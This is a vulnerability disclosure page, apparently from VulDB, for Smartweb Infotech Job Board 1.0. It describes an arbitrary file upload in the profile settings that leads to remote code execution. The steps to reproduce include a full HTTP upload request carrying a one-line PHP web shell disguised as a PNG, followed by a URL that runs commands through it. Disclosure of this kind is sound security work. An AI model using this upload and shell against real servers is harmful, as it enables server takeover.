| Titel | Job Board 1.0 - Arbitrary File Upload Leads to RCE |
|---|
| Beschreibung | Author : skalvin aka (CraCkEr)
Date : 25/06/2023
Website : https://demo.smartwebinfotech.site/job-board/
Vendor : Smartweb Infotech
Software : Job Board 1.0 - Job Portal Management System
Vuln Type: Arbitrary File Upload Leads to RCE
Impact : Upload PHPshell and execute commands on the server
Release Notes:
Allow Attacker to overwrite critical files simply by uploading a shell and execute
commands on the server
## Steps to Reproduce:
1. Go to [My Profile] on this Path (https://website/settings/account)
2. Upload any Image to capture the request in Burp Suite
3. Replace image.png to upload.php in [filename] and add this simple phpshell
POST /job-board/settings/account HTTP/2
-----------------------------427088175318086545183087924022
Content-Disposition: form-data; name="profile"; filename="shell.php"
Content-Type: image/png
<?php echo system($_GET['command']); ?>
-----------------------------427088175318086545183087924022--
4. Send the Request
5. Back to the Path (https://website/settings/account)
6. Refresh the Page
7. Copy the Link of (Unloaded Image)
8. Paste the Link of your uploaded PHPshell - Path (https://website/storage/upload/profile/shell_1687559183.php?command=id)
9. RCE Executed!
[-] Done |
|---|
| Benutzer | skalvin (UID 49463) |
|---|
| Einreichung | 25.06.2023 13:11 (vor 3 Jahren) |
|---|
| Moderieren | 04.07.2023 15:33 (9 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 232952 [SmartWeb Infotech Job Board 1.0 My Profile Page /settings/account filename erweiterte Rechte] |
|---|
| Punkte | 17 |
|---|